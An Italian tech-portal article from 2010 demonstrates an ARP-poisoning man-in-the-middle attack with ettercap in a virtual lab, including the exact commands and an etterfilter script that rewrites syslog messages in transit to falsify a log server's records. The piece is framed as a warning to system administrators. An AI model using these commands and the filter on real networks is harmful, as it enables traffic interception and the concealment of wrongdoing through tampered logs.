Home Tecnica Sicurezza ettercap: il man-in-the-middle facile

In evidenza

Smau Milano 2013 - 50ma edizione

Smau Milano 2013 - 50ma edizione

Forte dell’esperienza maturata nel Roadshow, Smau torna a Milano per la cinquantesima edizione del...
TecnoWorkshop Taranto2013: il programma

TecnoWorkshop Taranto2013: il programma

Ecco il programma del TecnoWorkshop Taranto2013 che si terrà sabato 14 settembre dalle 9:00 alle 14:30...
Festival della tecnologia ICT: la rivoluzione è cominciata

Festival della tecnologia ICT: la rivoluzione è cominciata

Si chiama festival della tecnologia ICT e non è una fiera né un congresso, ma un evento B2B innovativo...
TecnoWorkshop Taranto2013

TecnoWorkshop Taranto2013

Il giorno 14 settembre (sabato) dalle 9:00 alle 14:30 si terrà a Taranto, presso la sala Resta del...

Offerte di lavoro da InfoJobs

Società Italiana dei Professionisti delle Scienze dell'Informazione

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7

Iscrizione nuovi soci (10/10/2013)

La Società Italiana dei Professionisti delle Scienze dell'Informazione, con delibera del Consiglio Direttivo del 10/10/2013 ha iscritto nel proprio Libro dei Soci dei nuovi professionisti:

11 Nov 2013 - Letture:443

Convenzione con ANDIP

La Società Italiana dei Professionisti delle Scienze dell'Informazione ha stipulato una convenzione con l'associazione ANDIP (Associazione Nazionale per la Difesa della Privacy) grazie alla quale ogni Socio avrà la possibilità di accedere alle iniziative, convegni e quant'altro proposto da ANDIP.

23 Set 2013 - Letture:481

TecnoWorkshop Taranto2013: conclusioni

L'evento ICT tanto atteso nella provincia jonica si è da poco concluso; in qualità di Coordinatore Regionale SIPSI sento il dovere di ringraziare i professionisti e consulenti venuti per conoscere ed ascoltare tutti i colleghi che hanno relazionato ed ogni...

19 Set 2013 - Letture:473

Nomina Coordinatore regionale (31/07/2013)

La Società Italiana dei Professionisti delle Scienze dell'Informazione, con delibera del Consiglio Direttivo del 31/07/2013 ha nominato il seguente Coordinatore regionale.

10 Set 2013 - Letture:496

Iscrizione nuovi soci (31/07/2013)

La Società Italiana dei Professionisti delle Scienze dell'Informazione, con delibera del Consiglio Direttivo del 31/07/2013 ha iscritto nel proprio Libro dei Soci dei nuovi professionisti ed aziende.

09 Set 2013 - Letture:508

Modifica del Regolamento Attuativo

La Società Italiana dei Professionisti delle Scienze dell'Informazione, con delibera del Consiglio Direttivo del 28/03/2013 ha modificato il proprio Regolamento Attuativo.

09 Apr 2013 - Letture:841

Iscrizione nuovi soci (28/03/2013)

La Società Italiana dei Professionisti delle Scienze dell'Informazione, con delibera del Consiglio Direttivo del 28/03/2013 ha iscritto nel proprio Libro dei Soci dei nuovi professionisti.

29 Mar 2013 - Letture:952

Bandi di Concorso

Avviso di selezione nell'Agenzia per l'Italia Digitale di 3 analisti ICT

Nell’ambito del progetto Sistema Pubblico di connettività l'Agenzia per l'Italia digitale ha indetto una procedura comparativa per il conferimento di tre incarichi di collaborazione coordinata e continuativa per profili specialistici di “Analista ICT”.

09 Mag 2013 - Letture:1088

Tips & Tricks

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7

Come controllare i punti della patente di guida?

Un mio cliente dopo la notifica di verbale di accertamento della polizia municipale, comunica attraverso il modulo i dati della patente di un suo amico che era il conducente al momento dei fatti. Si è visto però recapitare una lettera del...

17 Ott 2013 - Letture:823

Realizzare un "conto alla rovescia" da terminale

Mi è capitato in questi giorni di necessitare di un contatore alla rovescia (o countdown in gergo) da utilizzare in un evento per dare il tempo ai relatori che si susseguivano nei loro interventi. Sembra strano ma quando si organizza...

16 Set 2013 - Letture:741

Grub2: ripristino di Grub da live-cd

Può succedere che GRUB2, per svariate cause non si avvii più, rendendo inservibile il nostro sistema operativo Debian (o altri sistemi operativi GNU/Linux installati nell’hard disk). Una delle cause principali di tutto questo è per esempio il voler installare anche Windows...

29 Mar 2013 - Letture:3781

Thomson TG585 v8: cambio DNS

Il software del router Thomson TG585 v8 non permette di modificare i DNS, così, se per esempio si volessero sostituire i DNS del provider con gli OpenDNS, non si trova nessuna interfaccia grafica per farlo. L'unica strada è quella di...

28 Feb 2013 - Letture:3553

Emacs: tabbar-mode

Una cosa utilissima presente negli editor (ma anche nei browser web) è quella di poter aprire una serie di documenti non in nuove pagine ma in schede o tab. Rimanendo nella categoria degli editor, un ottimo esempio è dato da Geany...

27 Feb 2013 - Letture:1091

Touchpad Tapping & Scrolling in Debian GNU/Linux

In Debian Squeeze 6 (anche in Wheezy), il tapping è disabilitato di default: "(xserver-xorg-input-synaptics (in Squeeze) has tapping disabled by default for touchpads with one or more physical buttons; see /usr/share/doc/xserver-xorg-input-synaptics/NEWS.Debian.gz. For a list of available options, see synclient -l . Not...

26 Feb 2013 - Letture:1287

Comparare due float in bash

Mi è capitato spesso di dover fare dei test tipo A > B dove A e B sono due numeri reali (float) all'interno di uno script bash. Il problema però è che bash ha solo una aritmetica intera... Cercando un po'...

22 Feb 2013 - Letture:1250

I più attivi

Dati e punteggi dell'ultimo anno

Maria Elisa Scarcia Maria Elisa Scarcia
5 articoli
0,525 punti totali
Vittorio D'Aversa Vittorio D'Aversa
9 articoli
0,344 punti totali
Rodolfo Giometti Rodolfo Giometti
10 articoli
0,265 punti totali
Giovanna Casamassima Giovanna Casamassima
9 articoli
0,244 punti totali
Alfredo Visconti Alfredo Visconti
8 articoli
0,173 punti totali

Ci hanno visitato

Oggi:2134
Ieri:2956
Totali (14/04/09):2610386

I nostri numeri

Articoli pubblicati: 783
Iscritti al portale: 1151
Iscritti all'Elenco: 231
Iscritti ML Discussioni: 408
Iscritti ML Articoli: 31
Iscritti ML Lavoro: 202
 
Corso pratico di una giornata sulle tecniche di prototipazione rapida per sistemi GNU/Linux embedded

Geexbox: la mini distro MediaCenter Linux

Geexbox è un piccolo ma potente sistema operativo orientato alla riproduzione di...

IPhone recupero file: un gioco di squadra!

Un giorno l'amico Armando Buzzanca mi chiama perchè deve recuperare una no...

Multi puntatore su Ubuntu 10.4: ecco come

Tempo fa ebbi modo di dare un'occhiata al progetto MPX per un cliente. La cosa n...

SL4A e il drone parla più lingue

Chi come me non ama Java si sentirà a disagio volendo programmare una qualsiasi ...

Quando il cliente complica il lavoro del consulente ....

Recentemente sono intervenuto presso una Piccola-Media-Impresa che lamentava pro...

Phishing: quando la rete pesca la truffa…

Il phishing è un tipo di truffa via Internet attraverso la quale un aggressore c...

Quando Firefox è lento

E' da qualche tempo che mi son accorto che Firefox, sulla mia Ubuntu 12.04 64bit...

PyGTK su N900

Come programmatore avere un cellulare che in pratica è un computer (oramai il 10...

GNU readline: un tool indispensabile per la linea di comando

Chiunque di voi abbia avuto a che fare con la linea di comando avrà senz'altro a...

Gobby: l'editor collaborativo

Quante volte vi sarà capitato di dover dire come modificare un file di testo ad ...

"Impronte digitali" anche per le macchine fotografiche

Da www.hwupgrade.it: Una ricerca della Binghamton University ha messo a punto u...

Come saltare il proxy «blocca-tutto» aziendale

Mi capita spesso, ma non sempre, di andare da dei miei clienti e non potermi con...

Programmare in C sull'N900

In questo articolo vedremo come sia semplice programmare in C sull'N900. In part...

Il NAS D-Link DNS-343

Grazie alla D-Link azienda produttrice di apparecchiature di rete e non solo v...

Registrazione domini: qualche novità per i “punto it”

Dal prossimo mese di luglio, esattamente dal giorno 11, presso il Registro ...

Come disabilitare il «Global Menu» in Ubuntu 11.10 e 12.04

Una delle novità introdotte nelle ultime versioni di Ubuntu (che usano quindi Gn...

Ubuntu Spyware: cosa si può fare?

Il Software Libero è una questione di libertà, non di prezzo. La libertà è quell...

OpenID Connect Standard. Riparte il cloud?

Che il mondo cloud, da sempre, non decolli anche a causa delle non chiare tecnol...

Come creare un NFS server ridondante

Quelli che mi conoscono sanno che il mio ambito lavorativo è nei sistemi embedde...

Demolinux: l'automazione industriale con Linux

Qualche tempo fa il mio ex istituto superiore mi aveva chiesto di fare una picco...

Thomson TG585 v8: cambio DNS

Il software del router Thomson TG585 v8 non permette di modificare i DNS, così, ...

Arduracing: come realizzare una robot-car intelligente con Arduino

Arduracing è un progetto realizzato con Arduino in collaborazione con il Lucccal...

WODE, l'emulatore DVD per la Wii

Qualche giorno fa mi è capitato di sfidare mio cognato ad una partitella a tenni...

Lion desktop: finalmente una distribuzione mirata alle aziende!

Chi è abituato a lavorare con Linux, ed in particolare ha provato a lavorare con...

Compilare un programma C per Android

Essendo un programmatore C (uso anche altri linguaggi, ma il C e quello che uso ...

Nvidia 295.33, ecco i nuovi driver per linux versione 3.3

L'annuncio è di qualche giorno fa, Nvidia rilascia i nuovi driver 295.33 con sup...

Process Analysis per Disaster Recovery Plan

La gestione del processo aziendale, per la sicurezza dei sistemi, rappresenta il...

Clonare una macchina vera in 30 minuti con VirtualBox

Essendo uno sviluppatore mi son reso conto che la virtualizzazione di una macchi...

Velocizzare la compilazione di Linux

Lavorando con sistemi embedded di diversa natura mi capita spessissimo di dover ...

(in)sicurezza informatica

L'incremento nell'uso del computer ha portato con se una diversa concezione di s...

Cloud Money

Discorrendo con un collega di cloud computing, si è finito, come al solito, a pa...

Server Linux: tutti i trucchi per farlo al meglio

Volete fare un server Linux per la vostra impresa, ufficio o semplicemente per c...

Aggiungere programmi all'N900 con Maemo SDK

Abbiamo già visto come sia facile installare nuove applicazioni sul Nokia N900, ...

Forno a microonde: analisi emissioni EME

Nell'immaginario collettivo c'è una forte paura per i danni che posso generare s...

Installare strace su Android

Quando si programma è importante avere buoni tool di debug e uno dei più importa...

Error 137 - chrome Internet non funziona

Error 137 - ERR_NAME_RESOLUTION_FAILED E' con questo messaggio di errore che ne...

Rete lenta? Vediamo chi consuma...

Molte volte capita di trovarsi la rete molto lenta e magari non abbiamo a dispos...

Verificare spazio su disco su UNIX

Nella gestione si sistemi informativi capita spesso di accedere a postazioni ser...

munin: come ti controllo il server aziendale

In questi ultimi tempi il server che mantiene il nostro portale è sottoposto ad ...

Odroid: la piattaforma di gioco libera

Si chiama Odroid ed e basata su Android, è la prima piattaforma di gioco interam...

OpenWRT: la distribuzione piccola e versatile

In queste ultime settimane ho avuto modo di vedere da vicino OpenWRT, una distri...

Portare la BeagleBone su OpenWRT

La BeagleBone è una scheda embedded ben supportata da diverse distribuzioni (emb...

XMount finalmente liberi di virtualizzare!

Cosa succede dopo che abbiamo acquisito un disco in bitstream su file immagine? ...

Recuperare risorse attraverso l'organizzazione

E' sempre maggiore la necessità di rendere efficienti i processi produttivi pres...

Gimp, OpenOffice & C. su N900? Semplice con Debian!

Che Maemo fosse versatile me ne sono accorto subito, ma l'idea di poter installa...

Sicurezza informatica: safety, dependability, security

La sempre maggiore diffusione delle tecnologie ha profondamente rivoluzionato la...

Il telefono… la tua voce!

Era lo slogan pubblicitario della Telecom di un po’ di anni fa. Certo, al concet...

Come ti controllo i tassi di interesse con Linux

In questi giorni sto cercando di fare una surruga per il mutuo di casa mia. Tra ...

Mageia 1 alpha1 è tra noi

Finalmente è stata rilasciata la tanto attesa versione alpha1 principalmente riv...

Linutop4 PC

Il produttore francese Linutop, con sede a Parigi, ha annunciato il nuovo modell...

Android: se non hai il telefono usa l'emulatore!

In questi giorni sto valutando di comprare un cellulare basato su Linux. Inizial...

Kameleon: oltre i limiti della virtualizzazione

Negli ultimi anni la potenza dei computer e la loro capacità è aumentata in modo...

Quando manca il comando «ldd»

Mi son trovato in questi giorni a dover lavorare con una distribuzione GNU/Linux...

Il settore danneggiato e l'acquisizione forense

Se si deve acquisire un hard disk in maniera forense, ossia con tutti i crismi n...

Boxee Box: la TV facile di D-Link

Grazie alla D-Link possiamo presentare un nuovo gioiello della tecnologia: il me...

Storie di kernel e microkernel

Ken Brown, della fondazione Alexis de Tocqueville Institution, sosteneva, in un ...

La Business Intelligence tra paura e tanta burocrazia

Le aziende cosi come le nostre pubbliche amministrazioni sono ormai anni e anni ...

PHP & Busybox httpd

Esistono diversi web server pensati appositamente per i sistemi embedded, alcuni...

Perché cross compilare quando si può compilare nativamente?

Lavorando con architetture diverse mi trovo spesso a dover utilzzare uno stesso ...

Emacs: tabbar-mode

Una cosa utilissima presente negli editor (ma anche nei browser web) è quella di...

ettercap: il man-in-the-middle facile

Stampa E-mail
(1 voto, media 5.00 di 5)
Area Tecnica - Sicurezza
Scritto da Rodolfo Giometti   
Domenica 29 Agosto 2010 14:34

logo

Troppo spesso mi rendo conto che molti considerano la rete aziendale o quella casalinga come sicura, pensando cioè che nessuno possa sapere quello che entra ed esce da e verso il proprio PC. Si pensa cioè che nessuno possa intercettare i nostri dati.

Ovviamente questo non è vero... a meno che non si usino trasmissioni basate su sistemi crittografici ben testati e liberamente studiabili per proteggere le proprie comunicazioni. In questo caso infatti le possibilità di essere intercettati è praticamente nulla.

Si noti che ho detto intenzionalmente «liberamente studiabili», sì perché un sistema è sicuro solo se è dimostrato che è sicuro e non perché ce lo assicura qualcuno... men che meno chi ce lo vuol vendere (mai fidarsi dei venditori! n.d.a. :). Di solito i sistemi basati sul Software Libero hanno questa caratteristica perché sono gli unici che possono essere validati da chiunque a partire dal codice sorgente fino al processo di compilazione.

Per sottolineare quanto detto, e quindi dimostrare come sia facile effettuare un banale attacco informatico in una LAN aziendale e/o casalinga userò ettercap. Con ettercap è possibile realizzare un attacco di tipo man-in-the-middle in una rete LAN dimostrando così molto velocemente come questa non sia assolutamente sicura se non si prendono le dovute precauzioni.

Naturalmente è possibile usare ettercap non solo per azioni cattive, ma anche per quelle buone: è possibile infatti usarlo anche per scoprire altri attacchi di tipo man-in-the-middle e proteggere quindi la propria LAN!

Quello che vi mostrerò in questo articolo serve solo per fare un esempio di quello che potrebbe succedere se non si protegge la propria LAN in maniera opportuna e non va inteso in nessun modo come un esempio di come compiere azioni illegali! Al contrario, serve a far vedere agli amministratori di sistema distratti da cosa si devono difendere!

Come esempio vediamo come taroccare i messaggi di log che un sistema può inviare ad un server il quale ha il compito di memorizzarli sui sui dischi interni per successive analisi da parte degli amministratori di rete. Questo sistema di invio dei log è standard su molti sistemi ma purtroppo presenta gravi lacune di sicurezza non utilizzando nessun sistema di crittazione e/o autenticazione per lo scambio dati!

Ma procediamo passo passo ed installiamoci ettercap; sulla mia ubuntu do semplicemente:

# aptitude install ettercap

e poi facciamo alcune supposizioni:

  1. Per effettuare l'attacco man-in-the-middle dobbiamo avere un PC nella sottorete da attaccare; supponiamo di avere una LAN di classe C con indirizzi nella sottorete 192.168.56.0/24.
  2. Supponiamo poi di sapere quale sia l'IP del server che raccoglie i log dei sistemi apparteneti alla sottorete; nel nostro caso 192.168.56.4.
  3. Il nostro attacco, in fine, si baserà sul modificare i log che un host invia al server; supponiamo che il suo IP sia 192.168.56.3.

Il punto 1. sembra molto difficile da realizzare, ma in realtà non lo è; infatti in molti casi gli attacchi ad un sistema informatico avvengono proprio da dentro la LAN e non dal di fuori! Nel nostro caso poi il fatto di voler inquinare i messaggi di log di un sistema è voluto proprio da chi sta dentro la LAN in modo da mascherare le (possibili) attività illecite che si vogliono perpretare.

Il punto 2. è anch'esso banale da realizzare. Riuscire a sapere l'IP di un server di un servizio pubblico è molto semplice, addirittura per un dipendente infedele basterà chiederlo all'amministratore di sistema...

Il punto 3. dice quale sarà il tipo di attacco che vogliamo realizzare, ma ne potremmo fare molti altri: carpire password, sniffare e-mail, sapere quali siti web vengono visitati da un PC, ecc..

Appurato questo facciamo uno schema del nostro attacco man-in-the-middle; normalmente la connessione tra il log server e un qualsiasi PC è:

                     +-----------+
                     |    HUB    |
                     +-+-+-+-+-+-+
                       |   |   |
        +--------------+   |   +--------------+
        |                  |                  |
+-------+-----------+      |        +---------+---------+
|    Log Server     ||        PC         |
|   192.168.56.4    |      |        |   192.168.56.3    |
| 08:00:27:E1:B6:C0 |      |        | 08:00:27:6c:b3:7f |
+-------------------+      |        +-------------------+
                           |
                   +-------+-----------+
                   |       MITM        |
                   |   192.168.56.1    |
                   | 0a:00:27:00:00:00 |
                   +-------------------+

In nero ho riportato i collegamenti fisici, mentre in rosso quelli logici (quelli cioè che vengono visti dagli utenti dei vari sistemi). Ho anche riportato la connesione fisica della macchina MITM che uso per eseguire l'attacco man-in-the-middle e dove ho installato ettercap, la quale, al momento, non ha nessun tipo di colloquio coi due sistemi vittima.

In queste condizioni le tabelle ARP dei due sistemi sono, per il log server:

# arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.56.3             ether   08:00:27:6c:b3:7f   C                     eth0

mentre per il PC:

# arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.56.4             ether   08:00:27:E1:B6:C0   C                     eth0

Ora iniziamo ad analizzare i pacchetti di log che i due sistemi si scambiano generando dei messaggi del tipo:

Aug 26 16:19:56 192.168.56.3 root: System is doing something evil

(per generare questi messaggi ho usato il comando logger)

Quindi abilitiamo l'attacco man-in-the-middle sulla macchina MITM e sniffiamo tutti i pacchetti che le due macchine si scambiano, ettercap ci mostra allora il seguente output:

# ettercap -T -i vboxnet0 -M arp /192.168.56.3/ /192.168.56.4/
[sudo] password for giometti:

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on vboxnet0... (Ethernet)

vboxnet0 ->    0A:00:27:00:00:00      192.168.56.1     255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)...

* |==================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : 192.168.56.3 08:00:27:6C:B3:7F

GROUP 2 : 192.168.56.4 08:00:27:E1:B6:C0
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help



Thu Aug 26 16:20:01 2010
UDP  192.168.56.3:514 --> 192.168.56.4:514 |

root: System is doing something evil

(non tenete conto delle date, potrebbero non essere coerenti, ciò è dovuto ad errate impostazioni dei timer di sistema e alle varie revisioni dell'articolo... inoltre, come avrete capito, il test l'ho fatto con delle macchine virtuali che girano su Virtualbox)

Se ora andiamo a ricontrollare la tabella ARP del log server:

root@node00:~# arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.56.3             ether   0a:00:27:00:00:00   C                     eth0

e del PC:

sarge:~# arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.56.4             ether   0A:00:27:00:00:00   C                     eth0

vediamo subito che sono state modificate: l'attacco è quindi in atto! Da ora in poi tutti i pacchetti da e verso i due PC vittima passeranno dal sistema (MITM) che attua l'attacco, si ha cioè una connessione logica (in rosso) del tipo:

                     +-----------+
                     |    HUB    |
                     +-+-+-+-+-+-+
                       |   |   |
        +--------------+   |   +--------------+
        |                  |                  |
+-------+-----------+      |        +---------+---------+
|    Log Server     |      |        |        PC         |
|   192.168.56.4    |      |        |   192.168.56.3    |
| 08:00:27:E1:B6:C0 |      |        | 08:00:27:6c:b3:7f |
+-------------------+      |        +---------+---------+
             ^             |                  ^
             |     +-------+-----------+      |
             |     |       MITM        |      |
             +---->|   192.168.56.1    |<-----+
                   | 0a:00:27:00:00:00 |
                   +-------------------+

Infatti, come mostrato, ettercap ci fa vedere il traffico di rete che intercorre tra le due macchine... ma non solo! Con ettercap lo possiamo anche modificare questo traffico di rete, basta usare un filtro. Un filtro ettercap è un programma scritto in un linguaggio molto simile al C e che può essere usato per analizzare e/o modificare al volo i pacchetti di rete intercettati da ettercap.

Il codice sorgente di un filtro appare come segue:

if (udp.src == 514 || udp.dst == 514) {
        if (search(DATA.data, "evil")) {
                replace("evil", "good");
                msg("string \"evil\" replaced!\n");
        }
}

ed il significato è abbastanza banale: se un pacchetto è di tipo UDP con porta sorgente o destinataria 514 e dentro il campo dati del medesimo pacchetto trovi la stringa evil, rimpiazzala con la stringa good e mostra il messaggio string "evil" replaced! all'utente ettercap.

Ora salviamo il filtro nel file syslog.filter e compiliamolo salvando il compilato del file syslog.filter.ef:

$ etterfilter syslog.filter -o syslog.filter.ef

etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA


12 protocol tables loaded:
DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

11 constants loaded:
VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

Parsing source file 'syslog.filter'  done.

Unfolding the meta-tree  done.

Converting labels to real offsets  done.

Writing output to 'syslog.filter.ef'  done.

-> Script encoded into 9 instructions.

quindi rilanciamo ettercap con il nuovo filtro:

# ettercap -T -i vboxnet0 -M arp -F syslog.filter.ef /192.168.56.3/ /192.168.56.4/

Se ora mandiamo un nuovo messaggio di log come già fatto prima, ettercap ci dice:

Thu Aug 26 16:25:41 2010
UDP  192.168.56.3:514 --> 192.168.56.4:514 |

root: System is doing something evil

string "evil" replaced!

mentre il log server ci mostra il messaggio:

Aug 26 16:25:45 192.168.56.3 root: System is doing something good

Il messaggio di log è stato taroccato! Facile no? :)

 
 

Login

           | 

In primo piano

Un nuovo sponsor per il Portale

Un nuovo sponsor per il Portale

Vi sarete senz'altro accorti che il nostro portale, da qualche tempo, è molto più affidabile e reattivo....
Pubblicità mirata dei prodotti

Pubblicità mirata dei prodotti

Hai un prodotto o un servizio da pubblicizzare? Fallo su consulenti-ict.it! Pubblicizzare un prodotto...
Recensioni sul Portale

Recensioni sul Portale

Hai un prodotto hardware/software o un libro riguardante uno dei temi dell'ICT? Vuoi farlo conoscere...

Professionisti e Consulenti ICT

Dai un'occhiata al nostro Elenco dei Professionisti e Consulenti ICT.
Trova l'esperto informatico, elettronico o delle telecomunicazioni che fa per te!

Mappa dell'Italia Puglia Molise Campania Abruzzo Marche Lazio Umbria Basilicata Toscana Emilia Romagna Calabria

- ItaliaCMS

Offerte di lavoro

Rodolfo Giometti at Studio EnneEnne - GNU/Linux embedded systems
La casa vacanze in Toscana perfetta per famiglie e gruppi numerosi.

Discussioni dal Forum

Nessun post da visualizzare.

Eventi

Non ci sono eventi in programma

Sondaggi

busyCaricamento Sondaggio...